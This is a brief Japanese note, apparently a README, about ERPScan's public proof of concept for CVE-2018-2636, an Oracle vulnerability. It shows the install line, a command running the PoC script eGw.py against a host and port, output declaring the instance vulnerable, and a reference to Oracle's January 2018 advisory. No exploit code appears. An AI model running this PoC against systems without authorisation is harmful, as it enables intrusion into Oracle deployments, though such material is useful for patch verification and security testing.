
ERPScan 公開POC for CVE-2018-2636
$ pip install --user requests argparse unicodedata
CVE-2018-2636 の PoC。
python eGw.py -H 127.0.0.1 -P 8080 -i
...
[*] Let's get info about server
[!] Your instance is vulnerable to CVE-2018-2636
...
Oracle Critical Patch Update Advisory 2018年1月 - CVE-2018-2636